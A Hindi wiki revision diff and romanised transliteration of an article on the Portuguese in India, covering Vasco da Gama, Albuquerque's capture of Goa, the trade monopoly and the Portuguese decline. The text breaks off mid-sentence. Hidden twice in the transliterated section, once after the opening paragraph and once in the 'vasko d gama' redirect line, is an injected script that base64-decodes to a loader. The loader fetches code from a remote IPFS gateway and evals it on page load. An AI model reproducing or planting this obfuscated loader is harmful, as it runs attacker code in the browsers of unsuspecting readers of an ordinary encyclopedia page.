Difference between revisions of "पुर्तग़ाली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सदी " to " सदी ")
Line 1: Line 1:
[[पुर्तग़ाल]] देश के लोगों को '''पुर्तग़ाली''' कहा जाता है। [[वास्कोडिगामा]] एक पुर्तग़ाली नाविक था। वास्कोडिगामा के द्वारा की गई [[भारत]] यात्राओं ने पश्चिमी यूरोप से 'केप ऑफ़ गुड होप' होकर पूर्व के लिए समुद्री मार्ग खोल दिए थे। जिस स्थान का नाम पुर्तग़ालियों ने [[गोवा]] रखा था, वह आज का छोटा-सा समुद्र तटीय शहर 'गोअ-वेल्हा' है। [[कालान्तर]] में उस क्षेत्र को गोवा कहा जाने लगा, जिस पर पुर्तग़ालियों ने क़ब्ज़ा किया था। [[17 मई]], 1498 ई. को वास्कोडिगामा ने भारत के पश्चिमी तट पर स्थित बन्दरगाह [[कालीकट]] पहुँचकर भारत के नये समुद्र मार्ग की खोज की। कालीकट के तत्कालीन शासक 'जमोरिन' ने वास्कोडिगामा का स्वागत किया। जमोरिन का यह व्यापार उस समय भारतीय व्यापार पर अधिकार जमाये हुए अरब व्यापारियों को पसन्द नहीं आया।
+
'''पुर्तग़ाली''' [[पुर्तग़ाल]] देश के निवासियों को कहा जाता है। [[वास्कोडिगामा]] एक पुर्तग़ाली नाविक था। वास्कोडिगामा के द्वारा की गई [[भारत]] यात्राओं ने पश्चिमी [[यूरोप]] से 'केप ऑफ़ गुड होप' होकर पूर्व के लिए समुद्री मार्ग खोल दिए थे। जिस स्थान का नाम पुर्तग़ालियों ने [[गोवा]] रखा था, वह आज का छोटा-सा [[समुद्र]] तटीय शहर 'गोअ-वेल्हा' है। [[कालान्तर]] में उस क्षेत्र को गोवा कहा जाने लगा, जिस पर पुर्तग़ालियों ने क़ब्ज़ा किया था। [[17 मई]], 1498 ई. को वास्कोडिगामा ने भारत के पश्चिमी तट पर स्थित बन्दरगाह [[कालीकट]] पहुँचकर भारत के नये समुद्र मार्ग की खोज की। कालीकट के तत्कालीन शासक 'जमोरिन' ने वास्कोडिगामा का स्वागत किया। जमोरिन का यह व्यापार उस समय भारतीय व्यापार पर अधिकार जमाये हुए [[अरब]] व्यापारियों को पसन्द नहीं आया।
 
{{tocright}}
 
{{tocright}}
==पुर्तग़ालियों का भारत आगमन==
+
==पुर्तग़ालियों का उत्थान==
आधुनिक युग में भारत आने वाले यूरोपीय व्यापारियों के रूप के पुर्तग़ाली सर्वप्रथम रहे। 'पोप अलेक्ज़ेण्डर षष्ठ' ने एक आज्ञा पत्र द्वारा पूर्वी समुद्रों में पुर्तग़ालियों को व्यापार करने का एकाधिकार प्रदान किया। प्रथम पुर्तग़ीज तथा प्रथम यूरोपीय यात्री वास्कोडिगामा 90 दिन की समुद्री यात्रा के बाद 'अब्दुल मनीक' नामक गुजराती पथ प्रदर्शक की सहायता से 1498 ई. में कालीकट (भारत) के समुद्री तट पर उतरा।
+
यद्यपि [[यूरोप]] के साथ [[भारत]] के व्यावहारिक सम्बन्ध बहुत पुराने थे, लेकिन वहाँ भारतीय वस्तुओं कि माँग में बारहवीं शताब्दी के आक्रमणों के साथ ही वृद्धि हुई। अरबी और तुर्की शासक वर्ग के ऐश्वर्य पूर्ण जीवन का प्रभाव यूरोप के शासक वर्ग पर भी पड़ा। रोमन साम्राज्य के विघटन के पश्चात जिस व्यापार और नगर जीवन को धक्का पहुँचा था, वह फिर से विकास करने लगा और इससे भी [[एशिया]] के साथ पुर्तग़ालियों का व्यापार बढ़ा। नगर में रहने वाले लोगों में रेशम, [[हीरा|हीरे]]-जवाहारात, इत्र, फुलेलों, चीनी-मिट्टी, कपड़ों आदि मंहगी चीज़ों के प्रति रुचि बढ़ीं यूरोप में मसालों की भी बहुत माँग थी, क्योंकि सर्दियों में वहाँ चारे की कमी के कारण जानवरों कि एक बड़ी संख्या को मार कर उनका माँस सुरक्षित रखना पड़ता था। इस माँस को खाने योग्य बनाने के लिए मसालों की जरूरत पड़ती थी।
वास्कोडिगामा के भारत आगमन से पुर्तग़ालियों एवं भारत के मध्य व्यापार के क्षेत्र में एक नये युग का शुभारम्भ हुआ। वास्कोडिगामा ने भारत आने और जाने पर हुए यात्रा के व्यय के बदले में 60 गुना अधिक कमाई की। धीरे-धीरे पुर्तग़ालियों का भारत आने का क्रम जारी हो गया। पुर्तग़ालियों के भारत आने के दो प्रमुख उद्देश्य थे-  
+
 
#अरबों और वेनिस के व्यापारियों का [[भारत]] से प्रभाव समाप्त करना।
+
भारतीय बंदरगाहों से सामान ले जाने वाले ज्यादातर अरब होते थे, हालाँकि भारतीय व्यापारी भी यह काम करते थे। अरब व्यापारी मालाबार तट पर पाँचवी शताब्दी से ही बस गये थे और मलयखाड़ी और दक्षिणी चीन में स्थित कैण्टन तक व्यापार करने लगे थे। अरबों ने स्थानीय शक्तियों के विरुद्ध अपने क़िले या गढ़ बनाने का प्रयत्न नहीं किया और न ही बलपूर्वक धर्म-परिवर्तन कराने की चेष्टा ही की। उन्होंने पूर्व प्रचलित व्यापार विधियों को भी नहीं बदला था। इसलिए भारतीय व्यापारी दक्षिण पूर्व एशिया और भारत-फ़ारस की खाड़ी से व्यापार करते रहे थे।
#[[ईसाई धर्म]] का प्रचार करना।
+
====भारत पहुँचने का प्रयास====
====प्रथम क़िले का निर्माण====
+
पुर्तग़ालियों के आगमन से इस तौर-तरीक़े में बहुत परिवर्तन आ गया। पद्रहवीं शताब्दी के आरम्भ में ही [[पुर्तग़ाल]] के शासक दोन हेनेरीक, जिसे 'नाविक हेनरी' के नाम से जाना जाता है, ने भारत पहुँचने के लिए सीधे समुद्री मार्ग की तलाश शुरू कर दी। राजकुमार हेनरी ने 1418 से ही हर साल दो-तीन जहाज पश्चिम अफ्रीका तट की खोज-[[चीन]] और [[भारत]] के लिए सीधे समुद्री की तलाश में भेजने शुरू कर दिये थे। इसका उद्देश्य दोहरा था, पहला अरबी और जेनोवी, वैनिसी आदि यूरोपीय प्रतिद्वन्द्वियों को समृद्धिशाली पूर्वी क्षेत्र के व्यापार से हटाना, और दूसरा तुर्की और अरबों की बढ़ती हुई शक्ति का मुक़ाबला करने के लिए अफ्रीका और एशिया के 'विधर्मियों' को [[ईसाई]] बनाना। इन दोनों उद्देश्यों को प्राप्त करने के लिए उसने बड़े जोश से काम किया। वस्तुतः ये दोनों उद्देश्य एक-दूसरे के पूरक और एक-दूसरे को न्याय संगत सिद्ध करने वाले थे। पोप ने 1453 में एक बिल पास करके इस कार्य को अपना समर्थन देते हुए अफ्रीकी बंदरगाह केप नोर के आगे 'सदा के लिए' इस शर्त पर दे दिया कि उन देशों के निवासियों को ईसाई बनाया जायेगा।
[[9 मार्च]], 1500 ई. को 13 जहाज़ों के एक बेड़े का नायक बनकर 'पेड्रों अल्वारेज केब्राल' जल-मार्ग द्वारा लिस्बन से भारत के लिए रवाना हुआ। वास्कोडिगामा के बाद भारत आने वाला यह दूसरा पुर्तग़ाली यात्री था। पुर्तग़ाली व्यापारियों ने भारत में कालीकट, [[गोवा]], [[दमन और दीव]] एवं हुगली के बंदरगाहों में अपनी व्यापारिक कोठियाँ स्थापित कीं। पूर्वी जगत के काली मिर्च और मसालों के व्यापार पर एकाधिकार प्राप्त करने के उद्देश्य से पुर्तग़ालियों ने 1503 ई. में [[कोचीन]] (भारत) में अपने पहले दुर्ग की स्थापना की। पुर्तग़ालियों के वे वायसराय, जिन्होंने पुर्तग़ालियों को भारत में अपने पैर जमाने के लिये भरपूर योगदान किया, उनके नाम इस प्रकार हैं-
+
====यूरोप और भारत से व्यापार====
#[[फ़्रांसिस्को-द-अल्मेडा]]
+
बार्थोलोम्यू दियाज़ ने 1487 में 'केप ऑफ़ गुड होप' का चक्कर लगा कर [[यूरोप]] और भारत के बीच सीधे व्यापार की आधार शिला रखी। इतनी लम्बी समुद्री यात्राएँ कई नयी खोजों के कारण सम्भव हो सकी। इनमें से प्रमुख खोजें थीं- कुतुबनुमा और समुद्री यात्रा के लिए एस्ट्रोलोब को अपनाना। ये खोजे भी यूरोप के पुनर्जागरण का परिणाम थीं। पुनर्जागरण सुनी हुई बातों और चर्च के कथन पर विश्वास करने की अपेक्षा स्वयं खोज का प्रतीक था। इस नयी चेतना के कारण ही उस काल में बारुद, [[काग़ज़]] और दूरबीन का निर्माण सम्भव हुआ। इस नयी चेतना ने साहसिक कार्यों के लिए प्रेरक-तत्व का काम किया।
#[[अलफ़ांसो-द-अल्बुकर्क]]
+
==वास्को द गामा==
#[[नीनो-डी-कुन्हा]]
+
{{main|वास्को द गामा}}
#[[जोवा-डी-कैस्ट्रो]]
+
वास्को द गामा 1498 में [[कालीकट]] के बंदरगाह पर उतरा। उसके साथ में दो जहाज़ थे, तीसरा रास्ते में ही नष्ट हो गया। [[अरब]] व्यापारियों ने उसका विरोध किया। लेकिन ज़ेमोरिन ने पुर्तग़ालियों का स्वागत किया और काली मिर्च और दवाईयाँ जहाज़ों पर चढ़ाने की उन्हें अनुमति दे दी। पुर्तगाल में वास्को द गामा द्वारा लाई गई वस्तुओं की क़ीमत सारी यात्रा पर जितना खर्च हुआ था, उसका साठ गुणा लगाई गई। इसके बावजूद [[भारत]] और [[यूरोप]] के बीच सीधा व्यापार बहुत ही विलम्ब से विकसित हुआ। इसका एक कारण इस व्यापार में पुर्तग़ालियों का एकाधिकार था। प्रारम्भ से ही पुर्तग़ाली शासकों का यह प्रयत्न रहा था कि पूर्वी व्यापार को शाही-एकाधिकार समझा जाए। उन्होंने इसके लिए प्रतिद्वन्द्वी यूरोपीय और एशियाई देशों को ही बाहर रखने का प्रयत्न नहीं किया, बल्कि निजी क्षेत्र के पुर्तग़ाली व्यापारियों को भी अनुमति नहीं दी।
====भारतीय राजनीति में हस्तक्षेप====
+
==शक्ति का विस्तार==
 +
पुर्तग़ालियों की बढ़ती हुई शक्ति से चिन्तित होकर [[मिस्र]] के सुल्तान ने एक जहाज़ी बेड़ा तैयार किया और उसे भारत की ओर रवाना कर दिया। [[गुजरात]] के शासक का एक जहाज़ी बेड़ा भी इसमें सम्मिलित हो गया। पुर्तग़ालियों पर प्रारम्भिक विजय के बावजूद, जिसमें पुर्तग़ाली गवर्नर का पुत्र दोन आलमीदा मारा गया था, 1509 में इस संयुक्त बेड़े की करारी हार हुई। इससे कुछ समय के लिए पुर्तग़ाली नौसेना [[हिन्द महासागर]] में सबसे शक्तिशाली हो गई और पुर्तग़ालियों को [[फ़ारस की खाड़ी]] और [[लाल सागर]] की ओर अपनी गतिविधियाँ बढ़ाने का मौका मिल गया। कुछ समय बाद ही पुर्तग़ालियों के द्वारा हस्तगत पूर्वी प्रदेशों का गवर्नर अल्बुकर्क बना। वह इस नीति का हिमायती था कि पूर्वी व्यापार में एकाधिकार बनाये रखने के लिए [[एशिया]] और [[अफ्रीका]] में सामरिक महत्व के स्थानों पर क़िले बनायें जाएँ, उसने इस नीति का पालन भी किया। इनकी सुरक्षा के लिए एक मज़बूत नौसेना की जरूरत थी। अपने इस विचार के समर्थन के लिए वह लिखता है कि "नौसेना द्वारा जीता गया कोई प्रदेश तब तक हाथ में नहीं रह सकता, जब तक क़िले न बनाये जाएँ।" उसका कथन था कि "शासक न तो व्यापार करेंगे और न तुमसे मित्रता के सम्बन्ध रखेंगे।"
 +
====नयी नीति का सूत्रपात====
 +
पुर्तग़ाली अल्बुकर्क ने [[बीजापुर]] से [[गोआ]] 1510 में छीनकर अपनी नयी नीति का सूत्रपात किया। गोआ का टापू बहुत अच्छा प्राकृतिक बंदरगाह और क़िला था। इसका सामरिक महत्व था और यहाँ से पुर्तग़ाली मालाबार के साथ व्यापार भी सम्भाल सकते थे और दक्षिण के शासकों की नीतियों पर नज़र भी रख सकते थे। यह गुजरात के बंदरगाहों के भी निकट था और पुर्तग़ाली वहाँ अपनी उपस्थिति का आभास दे सकते थे। अतः गोआ पुर्तग़ालियों के लिए व्यापार और राजनीति दोनों दृष्टियों से केन्द्रीय स्थल था। गोआ के हाथ से निकल जाने पर बीजापुर का शासक [[यूसुफ़ आदिलशाह]] होशियार हो गया और उसने 1510 में पुर्तग़ालियों पर चढ़ाई करके उन्हें खदेड़ दिया। किन्तु, उसी वर्ष उसकी मृत्यु हो गई और अल्बुकर्क ने इस अवसर का लाभ उठाते हुए गोआ पर फिर से अधिकार कर लिया। शहर में बीस दिन तक लूटमार चलती रही। इस लूटमार में मज़दूरों और ब्राह्मणों के सिवाय किसी को भी नहीं छोड़ा गया। क्योंकि वहाँ के लोगों ने आदिलशाह का साथ दिया था। पुर्तग़ाली गोआ के सामने मुख्य भूमि तक पहुँच गये और उन्होंने बीजापुरी बंदरगाहों डाँडा-राजपुरी और [[दभोल]] तक आने वाले मार्गों को अवरुद्ध कर दिया और वहाँ पर क़ब्ज़ा कर लिया। इस प्रकार उन्होंने बीजापुर का समुद्री व्यापार नष्ट कर दिया।
 +
==व्यापार पर अधिकार==
 +
गोआ से ही पुर्तग़ालियों ने अपनी शक्ति को बढ़ाया और [[श्रीलंका]] में, कोलम्बों में, सुमात्रा में अचिन में, और मलक्का बंदरगाह, जो मलय प्रायद्वीप और सुमात्रा के बीच की तंग खाड़ी का द्वार था, में क़िले बनाये। पुर्तग़ालियों ने अन्य देशों के व्यापार पर भी कड़ी शर्तें लगाईं। पुर्तग़ाली अधिकारियों से यात्रा-पत्र प्राप्त किए बिना कोई [[अरब]] या भारतीय जहाज़ [[अरब सागर]] में यात्रा नहीं कर सकता था। ये यात्रा-पत्र प्रदान करते हुए वे अरब और भारतीय जहाजों को काली मिर्च और हथियार आदि ले जाने की इज़ाजत नहीं देते थे। अनधिकृत व्यापार करने का संदेह होने पर जहाज़ की तलाशी ले सकने का अधिकार भी उन्होंने अपने लिए सुरक्षित रखा था। जो जहाज़ तलाशी देने से इंकार करते थे, उन्हें युद्ध पुरस्कार मान लिया जाता था और वे या तो डुबो दिए जाते थे या पकड़ लिए जाते थे। उनके यात्रियों को दास बना लिया जाता था। इससे पुर्तग़ालियों और इस क्षेत्र के देशों में निरन्तर युद्ध की स्थिति बनी रही। दक्षिणी राज्यों की अपनी-घुड़सेनाओं के लिए अरबी और ईराकी घोड़ों के आयात में बहुत रुचि थी। और गोआ इनके लिए आयात का मुख्य केन्द्र था। पुर्तग़ालियों ने घोड़ों के सारे व्यापार पर एकाधिकार कर लिया। पुर्तग़ालियों के मित्र राज्य घोड़ों को खरीदने के लिए अपने दलालों को गोआ भेज सकते थे। इस प्रकार पुर्तग़ालियों ने घोड़ों के व्यापार पर अपने अधिकार को एक राजनीतिक अस्त्र के रूप में इस्तेमाल किया और दक्षिणी राज्यों को एक-दूसरे से लड़वाते रहे।
 +
==भारतीय राजनीति में हस्तक्षेप==
 
अपनी शक्ति के विस्तार के साथ ही पुर्तग़ालियों ने भारतीय राजनीति में भी हस्तक्षेप करना प्रारम्भ कर लिया। इसका स्वाभाविक परिणाम यह हुआ कि, वे कालीकट के राजा से, जिसकी समृद्धि अरब सौदाग़रों पर निर्भर थी, शत्रुता रखने लगे। वे कालीकट के राजा के शत्रुओं से, जिनमें [[कोचीन]] का राजा प्रमुख था, संधियाँ करने लगे। [[भारत]] में पुर्तग़ालियों ने सबसे पहले प्रवेश किया, लेकिन अठाहरवीं [[सदी]] तक आते-जाते भारतीय व्यापार के क्षेत्र में उनका प्रभाव जाता रहा। उनके पतन के महत्त्वपूर्ण कारणों में उनकी धार्मिक असहिष्णुता की नीति, अल्बुकर्क के अयोग्य उत्तराधिकारी, [[डच]] तथा [[अंग्रेज़]] शक्तियों का विरोध, बर्बरतापूर्वक समुद्री लूटमार की नीति का पालन, [[स्पेन]] द्वारा पुर्तग़ाल की स्वतन्त्रता का हरण, [[विजयनगर साम्राज्य]] का विध्वंस आदि को गिनाया जाता है। उनकी धार्मिक असहिष्णुता की नीति से भारतीय शक्तियाँ रुष्ट हो गयीं, जिन पर पुर्तग़ाली विजय नहीं प्राप्त कर सके।
 
अपनी शक्ति के विस्तार के साथ ही पुर्तग़ालियों ने भारतीय राजनीति में भी हस्तक्षेप करना प्रारम्भ कर लिया। इसका स्वाभाविक परिणाम यह हुआ कि, वे कालीकट के राजा से, जिसकी समृद्धि अरब सौदाग़रों पर निर्भर थी, शत्रुता रखने लगे। वे कालीकट के राजा के शत्रुओं से, जिनमें [[कोचीन]] का राजा प्रमुख था, संधियाँ करने लगे। [[भारत]] में पुर्तग़ालियों ने सबसे पहले प्रवेश किया, लेकिन अठाहरवीं [[सदी]] तक आते-जाते भारतीय व्यापार के क्षेत्र में उनका प्रभाव जाता रहा। उनके पतन के महत्त्वपूर्ण कारणों में उनकी धार्मिक असहिष्णुता की नीति, अल्बुकर्क के अयोग्य उत्तराधिकारी, [[डच]] तथा [[अंग्रेज़]] शक्तियों का विरोध, बर्बरतापूर्वक समुद्री लूटमार की नीति का पालन, [[स्पेन]] द्वारा पुर्तग़ाल की स्वतन्त्रता का हरण, [[विजयनगर साम्राज्य]] का विध्वंस आदि को गिनाया जाता है। उनकी धार्मिक असहिष्णुता की नीति से भारतीय शक्तियाँ रुष्ट हो गयीं, जिन पर पुर्तग़ाली विजय नहीं प्राप्त कर सके।
 
==पुर्तग़ालियों का पतन==
 
==पुर्तग़ालियों का पतन==
Line 28: Line 34:
 
[[भारत]] में 'गोधिक स्थापत्य कला' का आगमन पुर्तग़ालियों के साथ हुआ। पुर्तग़ालियों ने गोवा, दमन और दीव पर 1661 ई. तक शासन किया। उनके आगमन से भारत में [[तम्बाकू]] की खेती, जहाज़ निर्माण तथा प्रिंटिंग प्रेस की शुरुआत हुई। इस प्रकार भारत में प्रथम प्रिंटिंग प्रेस की स्थापना 1556 ई. में गोवा में हुई थी।
 
[[भारत]] में 'गोधिक स्थापत्य कला' का आगमन पुर्तग़ालियों के साथ हुआ। पुर्तग़ालियों ने गोवा, दमन और दीव पर 1661 ई. तक शासन किया। उनके आगमन से भारत में [[तम्बाकू]] की खेती, जहाज़ निर्माण तथा प्रिंटिंग प्रेस की शुरुआत हुई। इस प्रकार भारत में प्रथम प्रिंटिंग प्रेस की स्थापना 1556 ई. में गोवा में हुई थी।
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी जातियाँ}}
 
{{विदेशी जातियाँ}}
Line 36: Line 42:
 
[[Category:गोवा]]
 
[[Category:गोवा]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 11:45, 24 March 2012

purtagali purtagal desh ke nivasiyoan ko kaha jata hai. vaskodigama ek purtagali navik tha. vaskodigama ke dvara ki gee bharat yatraoan ne pashchimi yoorop se 'kep aauf gud hop' hokar poorv ke lie samudri marg khol die the. jis sthan ka nam purtagaliyoan ne gova rakha tha, vah aj ka chhota-sa samudr tatiy shahar 'goa-velha' hai. kalantar mean us kshetr ko gova kaha jane laga, jis par purtagaliyoan ne qabza kiya tha. 17 mee, 1498 ee. ko vaskodigama ne bharat ke pashchimi tat par sthit bandaragah kalikat pahuanchakar bharat ke naye samudr marg ki khoj ki. kalikat ke tatkalin shasak 'jamorin' ne vaskodigama ka svagat kiya. jamorin ka yah vyapar us samay bharatiy vyapar par adhikar jamaye hue arab vyapariyoan ko pasand nahian aya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

purtagaliyoan ka utthan

yadyapi yoorop ke sath bharat ke vyavaharik sambandh bahut purane the, lekin vahaan bharatiy vastuoan ki maang mean barahavian shatabdi ke akramanoan ke sath hi vriddhi huee. arabi aur turki shasak varg ke aishvary poorn jivan ka prabhav yoorop ke shasak varg par bhi p da. roman samrajy ke vighatan ke pashchat jis vyapar aur nagar jivan ko dhakka pahuancha tha, vah phir se vikas karane laga aur isase bhi eshiya ke sath purtagaliyoan ka vyapar badha. nagar mean rahane vale logoan mean resham, hire-javaharat, itr, phuleloan, chini-mitti, kap doan adi manhagi chizoan ke prati ruchi badhian yoorop mean masaloan ki bhi bahut maang thi, kyoanki sardiyoan mean vahaan chare ki kami ke karan janavaroan ki ek b di sankhya ko mar kar unaka maans surakshit rakhana p data tha. is maans ko khane yogy banane ke lie masaloan ki jaroorat p dati thi.

bharatiy bandaragahoan se saman le jane vale jyadatar arab hote the, halaanki bharatiy vyapari bhi yah kam karate the. arab vyapari malabar tat par paanchavi shatabdi se hi bas gaye the aur malayakha di aur dakshini chin mean sthit kaintan tak vyapar karane lage the. araboan ne sthaniy shaktiyoan ke viruddh apane qile ya gadh banane ka prayatn nahian kiya aur n hi balapoorvak dharm-parivartan karane ki cheshta hi ki. unhoanne poorv prachalit vyapar vidhiyoan ko bhi nahian badala tha. isalie bharatiy vyapari dakshin poorv eshiya aur bharat-faras ki kha di se vyapar karate rahe the.

bharat pahuanchane ka prayas

purtagaliyoan ke agaman se is taur-tariqe mean bahut parivartan a gaya. padrahavian shatabdi ke arambh mean hi purtagal ke shasak don henerik, jise 'navik henari' ke nam se jana jata hai, ne bharat pahuanchane ke lie sidhe samudri marg ki talash shuroo kar di. rajakumar henari ne 1418 se hi har sal do-tin jahaj pashchim aphrika tat ki khoj-chin aur bharat ke lie sidhe samudri ki talash mean bhejane shuroo kar diye the. isaka uddeshy dohara tha, pahala arabi aur jenovi, vainisi adi yooropiy pratidvandviyoan ko samriddhishali poorvi kshetr ke vyapar se hatana, aur doosara turki aur araboan ki badhati huee shakti ka muqabala karane ke lie aphrika aur eshiya ke 'vidharmiyoan' ko eesaee banana. in donoan uddeshyoan ko prapt karane ke lie usane b de josh se kam kiya. vastutah ye donoan uddeshy ek-doosare ke poorak aur ek-doosare ko nyay sangat siddh karane vale the. pop ne 1453 mean ek bil pas karake is kary ko apana samarthan dete hue aphriki bandaragah kep nor ke age 'sada ke lie' is shart par de diya ki un deshoan ke nivasiyoan ko eesaee banaya jayega.

yoorop aur bharat se vyapar

bartholomyoo diyaz ne 1487 mean 'kep aauf gud hop' ka chakkar laga kar yoorop aur bharat ke bich sidhe vyapar ki adhar shila rakhi. itani lambi samudri yatraean kee nayi khojoan ke karan sambhav ho saki. inamean se pramukh khojean thian- kutubanuma aur samudri yatra ke lie estrolob ko apanana. ye khoje bhi yoorop ke punarjagaran ka parinam thian. punarjagaran suni huee batoan aur charch ke kathan par vishvas karane ki apeksha svayan khoj ka pratik tha. is nayi chetana ke karan hi us kal mean barud, kagaz aur doorabin ka nirman sambhav hua. is nayi chetana ne sahasik karyoan ke lie prerak-tatv ka kam kiya.

vasko d gama

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vasko d gama 1498 mean kalikat ke bandaragah par utara. usake sath mean do jahaz the, tisara raste mean hi nasht ho gaya. arab vyapariyoan ne usaka virodh kiya. lekin zemorin ne purtagaliyoan ka svagat kiya aur kali mirch aur davaeeyaan jahazoan par chadhane ki unhean anumati de di. purtagal mean vasko d gama dvara laee gee vastuoan ki qimat sari yatra par jitana kharch hua tha, usaka sath guna lagaee gee. isake bavajood bharat aur yoorop ke bich sidha vyapar bahut hi vilamb se vikasit hua. isaka ek karan is vyapar mean purtagaliyoan ka ekadhikar tha. prarambh se hi purtagali shasakoan ka yah prayatn raha tha ki poorvi vyapar ko shahi-ekadhikar samajha jae. unhoanne isake lie pratidvandvi yooropiy aur eshiyaee deshoan ko hi bahar rakhane ka prayatn nahian kiya, balki niji kshetr ke purtagali vyapariyoan ko bhi anumati nahian di.

shakti ka vistar

purtagaliyoan ki badhati huee shakti se chintit hokar misr ke sultan ne ek jahazi be da taiyar kiya aur use bharat ki or ravana kar diya. gujarat ke shasak ka ek jahazi be da bhi isamean sammilit ho gaya. purtagaliyoan par prarambhik vijay ke bavajood, jisamean purtagali gavarnar ka putr don alamida mara gaya tha, 1509 mean is sanyukt be de ki karari har huee. isase kuchh samay ke lie purtagali nausena hind mahasagar mean sabase shaktishali ho gee aur purtagaliyoan ko faras ki kha di aur lal sagar ki or apani gatividhiyaan badhane ka mauka mil gaya. kuchh samay bad hi purtagaliyoan ke dvara hastagat poorvi pradeshoan ka gavarnar albukark bana. vah is niti ka himayati tha ki poorvi vyapar mean ekadhikar banaye rakhane ke lie eshiya aur aphrika mean samarik mahatv ke sthanoan par qile banayean jaean, usane is niti ka palan bhi kiya. inaki suraksha ke lie ek mazaboot nausena ki jaroorat thi. apane is vichar ke samarthan ke lie vah likhata hai ki "nausena dvara jita gaya koee pradesh tab tak hath mean nahian rah sakata, jab tak qile n banaye jaean." usaka kathan tha ki "shasak n to vyapar kareange aur n tumase mitrata ke sambandh rakheange."

nayi niti ka sootrapat

purtagali albukark ne bijapur se goa 1510 mean chhinakar apani nayi niti ka sootrapat kiya. goa ka tapoo bahut achchha prakritik bandaragah aur qila tha. isaka samarik mahatv tha aur yahaan se purtagali malabar ke sath vyapar bhi sambhal sakate the aur dakshin ke shasakoan ki nitiyoan par nazar bhi rakh sakate the. yah gujarat ke bandaragahoan ke bhi nikat tha aur purtagali vahaan apani upasthiti ka abhas de sakate the. atah goa purtagaliyoan ke lie vyapar aur rajaniti donoan drishtiyoan se kendriy sthal tha. goa ke hath se nikal jane par bijapur ka shasak yoosuf adilashah hoshiyar ho gaya aur usane 1510 mean purtagaliyoan par chadhaee karake unhean khade d diya. kintu, usi varsh usaki mrityu ho gee aur albukark ne is avasar ka labh uthate hue goa par phir se adhikar kar liya. shahar mean bis din tak lootamar chalati rahi. is lootamar mean mazadooroan aur brahmanoan ke sivay kisi ko bhi nahian chho da gaya. kyoanki vahaan ke logoan ne adilashah ka sath diya tha. purtagali goa ke samane mukhy bhoomi tak pahuanch gaye aur unhoanne bijapuri bandaragahoan daanda-rajapuri aur dabhol tak ane vale margoan ko avaruddh kar diya aur vahaan par qabza kar liya. is prakar unhoanne bijapur ka samudri vyapar nasht kar diya.

vyapar par adhikar

goa se hi purtagaliyoan ne apani shakti ko badhaya aur shrilanka mean, kolamboan mean, sumatra mean achin mean, aur malakka bandaragah, jo malay prayadvip aur sumatra ke bich ki tang kha di ka dvar tha, mean qile banaye. purtagaliyoan ne any deshoan ke vyapar par bhi k di shartean lagaeean. purtagali adhikariyoan se yatra-patr prapt kie bina koee arab ya bharatiy jahaz arab sagar mean yatra nahian kar sakata tha. ye yatra-patr pradan karate hue ve arab aur bharatiy jahajoan ko kali mirch aur hathiyar adi le jane ki izajat nahian dete the. anadhikrit vyapar karane ka sandeh hone par jahaz ki talashi le sakane ka adhikar bhi unhoanne apane lie surakshit rakha tha. jo jahaz talashi dene se iankar karate the, unhean yuddh puraskar man liya jata tha aur ve ya to dubo die jate the ya pak d lie jate the. unake yatriyoan ko das bana liya jata tha. isase purtagaliyoan aur is kshetr ke deshoan mean nirantar yuddh ki sthiti bani rahi. dakshini rajyoan ki apani-ghu dasenaoan ke lie arabi aur eeraki gho doan ke ayat mean bahut ruchi thi. aur goa inake lie ayat ka mukhy kendr tha. purtagaliyoan ne gho doan ke sare vyapar par ekadhikar kar liya. purtagaliyoan ke mitr rajy gho doan ko kharidane ke lie apane dalaloan ko goa bhej sakate the. is prakar purtagaliyoan ne gho doan ke vyapar par apane adhikar ko ek rajanitik astr ke roop mean istemal kiya aur dakshini rajyoan ko ek-doosare se l davate rahe.

bharatiy rajaniti mean hastakshep

apani shakti ke vistar ke sath hi purtagaliyoan ne bharatiy rajaniti mean bhi hastakshep karana prarambh kar liya. isaka svabhavik parinam yah hua ki, ve kalikat ke raja se, jisaki samriddhi arab saudagaroan par nirbhar thi, shatruta rakhane lage. ve kalikat ke raja ke shatruoan se, jinamean kochin ka raja pramukh tha, sandhiyaan karane lage. bharat mean purtagaliyoan ne sabase pahale pravesh kiya, lekin athaharavian sadi tak ate-jate bharatiy vyapar ke kshetr mean unaka prabhav jata raha. unake patan ke mahattvapoorn karanoan mean unaki dharmik asahishnuta ki niti, albukark ke ayogy uttaradhikari, dach tatha aangrez shaktiyoan ka virodh, barbaratapoorvak samudri lootamar ki niti ka palan, spen dvara purtagal ki svatantrata ka haran, vijayanagar samrajy ka vidhvans adi ko ginaya jata hai. unaki dharmik asahishnuta ki niti se bharatiy shaktiyaan rusht ho gayian, jin par purtagali vijay nahian prapt kar sake.

purtagaliyoan ka patan

purtagaliyoan ka chupake-chupake vyapar karana ant mean unhian ke lie ghatak siddh hua. brajil ka pata lag jane par purtagal ki upanivesh sanbandhi kriyashilata pashchim ki or unmukh ho gayi. aantatah unake pichhe ane vali yooropiy kanpaniyoan se unaki pratidvandita huee, jisamean ve pichh de gaye. adhikaansh bhag unake hath se nikal ge. dach aur british kampaniyoan ke hind mahasagar mean a jane se purtagaliyoan ka ekadhikar samapt ho gaya. 1538 ee. mean 'adan' par turki adhikar ho gaya. 1602 ee. mean dachoan ne 'vantam' ke samip purtagali be de par akraman kar use parajit kar diya. 1641 ee. mean dachoan ne purtagaliyoan ke mahattvapoorn malakka durg ko jit liya. 1628 ee. mean farasi sena ki sahayata se aangrezoan ne 'haramuj' par adhikar kar liya tatha marathoan ne 1739 ee. mean salaset dvip aur basin par adhikar kar liya. 1661 ee. tak keval gova, daman aur div hi 